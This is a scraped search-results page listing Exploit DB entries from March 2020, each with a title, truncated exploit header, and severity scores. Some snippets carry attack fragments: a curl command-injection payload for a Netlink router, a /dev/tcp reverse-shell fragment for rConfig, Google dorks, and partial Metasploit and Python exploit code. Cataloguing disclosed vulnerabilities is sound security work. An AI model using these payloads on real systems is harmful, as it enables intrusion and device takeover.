Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2020/03/24 12:0 a.m.231 views

UliCMS 2020.1 - Persistent Cross-Site Scripting

Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2019-03-24 Exploit Author: SunCSR Vendor Homepage: https://en.ulicms.de Software Link: https://en.ulicms.de/currentversions.html Version: 2020.1 Tested on: Windows CVE : CVE-2020-12704 Vulnerability : Stored...

6.1CVSS6.4AI score0.01186EPSS
Exploits1
Exploit DB
Exploit DB
added 2020/03/24 12:0 a.m.347 views

UCM6202 1.0.18.13 - Remote Command Injection

Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection Date: 2020-03-23 Exploit Author: Jacob Baines Vendor: http://www.grandstream.com Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series Tested on: UCM6202 1.0.18.13 CVE : CVE-2020-5722 Shodan...

10CVSS9.5AI score0.83926EPSS
Exploits8
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.98 views

Wordpress Plugin PicUploader 1.0 - Remote File Upload

Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload Google Dork: N/A Date: 2020.03.22 Exploit Author: Milad Karimi Vendor Homepage: https://github.com/xiebruce/PicUploader Software Link: https://github.com/xiebruce/PicUploader Category : webapps Version: 1.0 Tested on: windows 10...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.273 views

CyberArk PSMP 10.9.1 - Policy Restriction Bypass

Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass Google Dork: NA Date: 2020-02-25 Exploit Author: LAHBAL Said Vendor Homepage: https://www.cyberark.com/ Software Link: https://www.cyberark.com/ Version: PSMP = 11.1 Prerequisites Policy allows us to overwrite PSMRemoteMachine...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.222 views

FIBARO System Home Center 5.021 - Remote File Include

Exploit Title: FIBARO System Home Center 5.021 - Remote File Include Date: 2020-03-22 Author: LiquidWorm Vendor: https://www.fibaro.com CVE: N/A Vendor: FIBAR GROUP S.A. Product web page: https://www.fibaro.com Affected version: Home Center 3, Home Center 2, Home Center Lite 5.021.38 4.580 4.570...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.215 views

ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)

Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service PoC Author: Ivan Marmolejo Date: 2020-03-22 Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 Software Link: App Store for iOS devices Tested Version: 5.0.25920 Vulnerability Type: Denial of Service...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.163 views

rConfig 3.9.4 - 'search.crud.php' Remote Command Injection

Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip Version: rConfig 3.9.4 Tested on: Cent OS 7 1908...

9.8CVSS9.7AI score0.83862EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.215 views

Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection

Exploit Title: Joomla! comhdwplayer 4.2 - 'search.php' SQL Injection Dork: inurl:"index.php?option=comhdwplayer" Date: 2020-03-23 Exploit Author: qw3rTyTy Vendor Homepage: https://www.hdwplayer.com/ Software Link: https://www.hdwplayer.com/download/ Version: 4.2 Tested on: Debian/Nginx/Joomla!...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/23 12:0 a.m.236 views

Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)

Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service PoC Google Dork: N/A Date: 2020-02-21 Exploit Author: Cem Onat Karagun of Diesec GmBH Vendor Homepage: https://www.google.com/ Version: Google Chrome 80.0.3987.87 Tested on: Windows x64 / Linux Debian x64 / MacOS...

8.8CVSS8.2AI score0.02045EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/21 12:0 a.m.315 views

Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)

/ FreeBSD 12.0-RELEASE x64 Kernel Exploit Usage: $ clang -o exploit exploit.c -lpthread $ ./exploit / include include include include include include include include define KERNEL include undef KERNEL define WANTFILE include include include include include define WANTSOCKET include include define...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/20 12:0 a.m.411 views

Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)

Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.exagate.com/ Software Link: https://www.exagate.com/sysguard-6001 Version: SYSGuard 6001 HTML CSRF PoC :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/20 12:0 a.m.199 views

VMware Fusion 11.5.2 - Privilege Escalation

Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation Date: 2020-03-17 Exploit Author: Rich Mirch Vendor Homepage: https://www.vmware.com/products/fusion.html Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html Software Link:...

7.8CVSS7.6AI score0.07254EPSS
Exploits10
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.260 views

Broadcom Wi-Fi Devices - 'KR00K Information Disclosure

Kr00ker Experimetal KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, that allows to decrypt some WPA2 CCMP data in vulnerable devices. More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP...

3.1CVSS6.2AI score0.07709EPSS
Exploits7
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.623 views

Netlink GPON Router 1.0.11 - Remote Code Execution

Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.223 views

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: An uncontrolled resource consumption vulnerability ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.173 views

NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path

Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Discovery Date: 2020-03-17 Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas Tested Version: 7.0 Vulnerability Type: Unquoted t Service Pat...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.233 views

Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload

Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload Google Dork: inurl:"index.php?option=comacym" Date: 2020-03-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.acyba.com/ Software Link: https://www.acyba.com/acymailing/download.html Version: v6.9.1...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/17 12:0 a.m.297 views

Rconfig 3.x - Chained Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rconfig 3.x Chained Remote Code Execution', 'Description' = ' This module exploits multiple vulnerabilities in rConfig version 3.9 in order to...

8.8AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/17 12:0 a.m.182 views

Microsoft VSCode Python Extension - Code Execution

VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/17 12:0 a.m.38 views

UADMIN Botnet 1.0 - 'link' SQL Injection

Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection Google Dork: n/a Date: 2020-03-16 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: unkn0wn Version: unkn0wn Tested on: Windows 10, Kali CVE : n/a Vuln-Code: download.php $link=$GET'link'; $agent=esc$SERVER'HTTPUSERAGENT';...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/17 12:0 a.m.389 views

ManageEngine Desktop Central - Java Deserialization (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ManageEngine Desktop Central Java Deserialization', 'Description' = %q This module exploits a Java deserialization vulnerability in the...

10CVSS7.4AI score0.99941EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/03/17 12:0 a.m.115 views

VMWare Fusion - Local Privilege Escalation

Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusion 11.0.0 10120384 on macOS 10.14.1 VMware...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/16 12:0 a.m.223 views

Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)

Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link: http://www.sumavision.com/ensite/i.php?id=29 Version: EMR 3.0.4.27 CVE : CVE-2020-10181...

9.8CVSS9.6AI score0.14209EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/16 12:0 a.m.209 views

PHPKB Multi-Language 9 - Authenticated Remote Code Execution

Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version: Multi-Language v9 Tested on...

7.2CVSS7AI score0.04884EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/16 12:0 a.m.210 views

PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution

Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...

7.2CVSS7AI score0.12339EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/16 12:0 a.m.207 views

PHPKB Multi-Language 9 - Authenticated Directory Traversal

Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version: Multi-Language v9 Tested on:...

4.9CVSS5.2AI score0.07844EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/16 12:0 a.m.409 views

MiladWorkShop VIP System 1.0 - 'lang' SQL Injection

Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection Google Dork: Powered By MiladWorkShop VIP System Date: 2020-03-03 Exploit Author: AYADI Mohamed email : [email protected] Vendor Homepage: https://miladworkshop.ir/ Software Link: https://miladworkshop.ir/vip.html Version:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/14 12:0 a.m.658 views

Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)

CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This script connects to the target host, and compresses the authentication request with a bad offset field set in t...

10CVSS9.1AI score0.9981EPSS
Exploits125
Exploit DB
Exploit DB
added 2020/03/13 12:0 a.m.1023 views

Centos WebPanel 7 - 'term' SQL Injection

Exploit Title: Centos WebPanel 7 - 'term' SQL Injection Google Dork: N/A Date: 2020-03-03 Exploit Author: Berke YILMAZ Vendor Homepage: http://centos-webpanel.com/ Software Link: http://centos-webpanel.com/ Version: v6 - v7 Tested on: Kali Linux - Windows 10 CVE : CVE-2020-10230 Type: Error Based...

9.8CVSS9.9AI score0.14668EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/03/13 12:0 a.m.24 views

WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification

Exploit Title: Wordpress Plugin Custom Searchable Data System - Unauthenticated Data modification Date: 13 March 2020 Exploit Author: Nawaf Alkeraithe Vendor Homepage: https://wordpress.org/plugins/custom-searchable-data-entry-system/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/13 12:0 a.m.191 views

Drobo 5N2 4.1.1 - Remote Command Injection

Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection Date: 2020-03-12 Exploit Author: Rick Ramgattie, Ian Sindermann Vendor Homepage: https://www.drobo.com/ Version: 4.1.1 and lower. CVE: CVE-2018-14709, CVE-2018-14701 !/usr/bin/env python3 nasty.py - A proof-of-concept utility for malicious...

9.8CVSS9.6AI score0.19994EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/03/13 12:0 a.m.165 views

AnyBurn 4.8 - Buffer Overflow (SEH)

Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.191 views

WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection

Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Google Dork: N/A Date: 2020-03-05 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip Version:...

7.8CVSS6.2AI score0.08612EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.188 views

WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure

Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Date: 2020-03-11 Vendor: https://www.watchguard.com Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdradhelperc.html CVE:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.162 views

Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection

Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork: inurl:index.php?option=comnewsfeeds...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.458 views

ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path

Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-11 Vendor Homepage: https://www.asus.com/ Software Link...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.187 views

HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)

Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8 Vulnerability Type : Cross-Site Request Forgery Add Admin...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.166 views

rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution

Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...

9CVSS9AI score0.36754EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/03/12 12:0 a.m.282 views

rConfig 3.9 - 'searchColumn' SQL Injection

Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see also : https://github.com/rconfig/rconfig...

9.8CVSS9.5AI score0.99683EPSS
Exploits14
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.62 views

CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)

class MetasploitModule 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal', 'Description' = %qAn issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a .......

5.3CVSS5.6AI score0.1433EPSS
Exploits7
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.27 views

TeamCity Agent XML-RPC 10.0 - Remote Code Execution

Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution Date: 2020-03-20 Exploit Author: Dylan Pindur Vendor Homepage: https://www.jetbrains.com/teamcity/ Version: TeamCity buildAgent.runBuild 123456 x ONAGENT x system.build.number 0 myVcsRootCurrentRev...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.109 views

Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion

exploit-inc-inclusion.py !/usr/bin/env python3 from horde import Horde import subprocess import sys TEMPDIR = '/tmp' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode = sys.argv5 log into the web application horde = Hordebaseurl,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.33 views

Wing FTP Server - Authenticated CSRF (Delete Admin)

Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation Date: 2020-03-10 Exploit Author: Dhiraj Mishra Vendor Homepage: https://www.wftpserver.com Version: v6.2.6 Tested on: Windows 10 Summary: An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTM...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.222 views

PlaySMS 1.4.3 - Template Injection / Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Execution', 'Description' = %q This module exploits a Preauth Server-Side Template Injectio...

9.8CVSS9.8AI score0.86689EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.152 views

WordPress Plugin Search Meter 2.13.2 - CSV injection

Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip Version: 2.13.2 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.939 views

ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path

Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-10 Vendor Homepage: https://www.asus.com/ Software Link...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.184 views

Horde Groupware Webmail Edition 5.2.22 - PHAR Loading

exploit-phar-loading.py !/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMPDIR = '/tmp' WWWROOT = '/var/www/html' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode = sys.argv5 source =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.38 views

CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' , 'Description' = %q This module exploits an authentication bypass in...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.36 views

CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)

class MetasploitModule 'CVE-2019-9649 CoreFTP FTP Server Version 674 and below MDTM Directory Traversal', 'Description' = %qAn issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. Using the MDTM FTP command, a remote attacker can use a directory traversal ....\ to browse...

5.3CVSS5.6AI score0.14535EPSS
Exploits8
Exploit DB
Exploit DB
added 2020/03/11 12:0 a.m.189 views

Joomla! 3.9.0 < 3.9.7 - CSV Injection

!/usr/bin/python3 Exploit Title: Joomla 3.9.0 ' printf'Example: sys.argv0 http://127.0.0.1 ' sys.exit1 baseurl = sys.argv1 regurl = f"baseurl/joomla/index.php/component/users/?view=registration&Itemid=101" loginurl = f"baseurl/joomla/index.php?option=comusers" def pwnusername='abdullah': payload ...

9.8CVSS9.8AI score0.1049EPSS
Exploits1
Total number of security vulnerabilities47904